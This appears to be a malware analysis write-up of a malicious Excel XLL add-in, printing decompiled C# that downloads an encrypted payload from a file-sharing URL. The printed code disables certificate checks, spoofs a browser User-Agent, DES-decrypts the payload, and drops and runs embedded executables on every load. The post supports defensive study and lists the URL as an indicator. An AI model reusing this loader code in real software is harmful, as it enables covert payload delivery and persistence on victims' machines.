  • Upon loading the file, the presence of an HttpWebRequest immediately stands out, indicating communication with a file-sharing platform.
  • Before initiating the request, the code forces the use of TLS 1.2 for content retrieval from jumpshare.com. This ensures compatibility with servers requiring modern security protocols. The response content is retrieved as a UTF-8 encoded string.
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
  • WebRequest.Create() then initializes a new web request to the URL, and the line below it sets the method to GET.
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create("https://jumpshare.com/viewer/load/kFEPlgWBGfeyXVXCxD3u");

httpWebRequest.Method = "GET";
  • The misleading UserAgent string, which imitates an outdated Internet Explorer browser, is likely intended to help the request get past some web application firewalls and bot-detection systems.
httpWebRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MSIE/11.0; rv:11.0;) like Gecko";
  • This line overrides SSL certificate validation: the callback always returns true, so certificate errors are ignored and every certificate is accepted, allowing the program to connect to malicious servers.
httpWebRequest.ServerCertificateValidationCallback = ((object _s, X509Certificate _x509s, X509Chain _x509c, SslPolicyErrors _ssl) => true);

Decryption and Execution

  • The decryption routine takes a Base64-encoded, DES-encrypted string, decrypts it with a predefined key and initialization vector (IV), and returns the result as plaintext.
  • Before decoding, spaces in textToDecrypt are replaced with + symbols; the Base64 string is then decoded into a byte array.

The decryption process begins by creating a DESCryptoServiceProvider object:

using (DESCryptoServiceProvider descryptoServiceProvider = new DESCryptoServiceProvider())

MemoryStream is then set up to store the decrypted output:

MemoryStream memoryStream = new MemoryStream();

Next, a CryptoStream is initialized to handle the decryption process using the DES key (rgbKey) and IV (rgbIV), which have been previously converted into byte arrays:

CryptoStream cryptoStream = new CryptoStream(memoryStream, descryptoServiceProvider.CreateDecryptor(rgbKey, rgbIV), CryptoStreamMode.Write);

The Base64-decoded encrypted byte array is written to the CryptoStream:

cryptoStream.Write(array, 0, array.Length);

Finally, the decryption is completed, and the data is pushed into the MemoryStream:

cryptoStream.FlushFinalBlock();

The decrypted bytes in the MemoryStream are then converted into a UTF-8 string:

text = Encoding.UTF8.GetString(memoryStream.ToArray());

The decrypted plaintext could serve as executable code, configuration data, or other instructions. However, because the payload hosted on jumpshare.com is no longer available, the exact response remains unknown.
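
If a copy of the response were recovered, the routine above could be reproduced offline. The following is a sketch under stated assumptions: it relies on the third-party pycryptodome package, it assumes the .NET defaults for DESCryptoServiceProvider (CBC mode with PKCS7 padding) because the decompiled code shown here does not set Mode or Padding, and the key and IV must be supplied by the analyst since they are not listed in this post. The function names are illustrative.

```python
import base64


def normalize_base64(text_to_decrypt: str) -> bytes:
    """Mirror the sample's preprocessing: spaces become '+' before Base64 decoding."""
    return base64.b64decode(text_to_decrypt.replace(" ", "+"))


def des_cbc_decrypt(text_to_decrypt: str, key: bytes, iv: bytes) -> str:
    """Decrypt Base64 text with DES-CBC and PKCS7 padding, returning UTF-8 text."""
    # Third-party dependency (pip install pycryptodome), imported lazily so
    # the Base64 helper above works without it.
    from Crypto.Cipher import DES
    from Crypto.Util.Padding import unpad

    ciphertext = normalize_base64(text_to_decrypt)
    cipher = DES.new(key, DES.MODE_CBC, iv=iv)  # key and IV are 8 bytes each
    return unpad(cipher.decrypt(ciphertext), DES.block_size).decode("utf-8")
```

Keeping the Base64 preprocessing separate makes it easy to check that the input decodes cleanly before worrying about the key and IV.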

Execution of Malicious Content

  • With the decryption routine understood, the next phase focuses on how the malicious content is retrieved and executed.
  • The code retrieves a response from jumpshare.com that appears to contain an encrypted payload. This response is passed to a method that isolates the encrypted portion, decodes it from Base64, and decrypts it with the DES key and initialization vector (IV) to obtain plaintext.
  • Once decryption is complete, the code executes the decrypted content.

The decrypted payload initiates further actions, such as:

  • Writing multiple Base64-encoded files to disk.
  • Executing the dropped payloads.

AutoOpen Method Analysis

  • The AutoOpen method serves as the automation mechanism for loading and executing malicious content embedded within the XLL file.
public void AutoOpen()
  {
   try
   {
    if (File.Exists(test.excel_path))
    {
     new Thread(new ThreadStart(this.Thread1)).Start();
    }
    else
    {
     File.WriteAllBytes(test.excel_path, System.Convert.FromBase64String(test.excel_base64));
     File.WriteAllBytes(test.exePath, System.Convert.FromBase64String(test.exe_base64));
     File.WriteAllBytes(test.configPath, System.Convert.FromBase64String(test.config_base64));
     File.WriteAllBytes(test.DllPath, System.Convert.FromBase64String(test.Dll_base64));
     this.Get();
     new Thread(new ThreadStart(this.Thread1)).Start();
    }
   }
   catch (Exception)
   {
   }
  }
  • This design ensures the payload is triggered every time the XLL is loaded, establishing persistence on the target system.

The program checks whether test.excel_path exists:

  • If it exists, it starts a new thread (Thread1) to launch the file.
  • If it doesn’t exist, it writes multiple files to disk from Base64-encoded data, calls Get() to execute the payload, and then starts Thread1 to launch the file.
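
The Base64 fields written by AutoOpen (excel_base64, exe_base64, config_base64, Dll_base64) can be triaged without running the add-in. The sketch below assumes the decompiled class has been exported from dnSpy as C# source text and that the blobs appear as ordinary string literals; the regular expression, the 40-character threshold, and the names used are illustrative assumptions.

```python
import base64
import re

# Long string literals made only of Base64 characters.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')

MAGICS = [
    (b"MZ", "PE file"),
    (b"PK\x03\x04", "ZIP/OOXML"),
    (b"\xd0\xcf\x11\xe0", "OLE2"),
    (b"<?xml", "XML"),
]


def decode_embedded_blobs(source: str):
    """Yield (decoded_length, type_guess) for each long Base64 literal in source."""
    for match in B64_LITERAL.finditer(source):
        try:
            blob = base64.b64decode(match.group(1), validate=True)
        except ValueError:
            continue  # looked like Base64 but did not decode cleanly
        guess = next((label for magic, label in MAGICS if blob.startswith(magic)), "unknown")
        yield len(blob), guess
```

Knowing which literal decodes to a PE file and which to a decoy spreadsheet or configuration file helps decide what to extract and analyze next.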

Decryption Behavior

  • Retrieves malicious JS, decrypts it, and executes it, evading detection.
  • Writes and decodes files to obfuscate content and avoid immediate suspicion.
  • Ensures persistence by executing the malicious process every time the program is launched.
  • Uses Base64 encoding and dynamic execution to bypass antivirus/EDR.
  • Runs the payload on separate threads to maintain stealth and avoid blocking the main program.

Observed Behavior

  • Persistence: The xlAutoOpen export ensures automatic execution whenever the XLL is loaded, so the payload runs again each time the add-in loads and is difficult to remove without deeper investigation.
  • Evasion: Base64 encoding, combined with dynamic decryption and execution, obfuscates the malicious content. SSL validation bypass and misleading User-Agent strings help circumvent antivirus/EDR solutions and web application firewalls.
  • File Writing: The code writes multiple Base64-encoded files to disk, further obfuscating malicious intent while preparing payloads for execution.
  • Payload Execution: Encrypted scripts retrieved from remote servers are decrypted and executed. These actions enable attackers to install additional malware components or initiate further malicious activities.

Conclusion

  • By using ExcelDNA-Unpack to extract the components of XLL add-ins and dnSpy to reverse-engineer their underlying code, we uncovered how attackers embed malicious behavior, such as downloading additional payloads or executing obfuscated scripts. The consistent presence of xlAutoOpen as an entry point underscores its importance in XLL-based attacks. To mitigate these threats, organizations should closely monitor the use of XLL add-ins and restrict the use of external add-ins.

IOCs: hxxps[://]jumpshare[.]com/viewer/load/kFEPlgWBGfeyXVXCxD3u
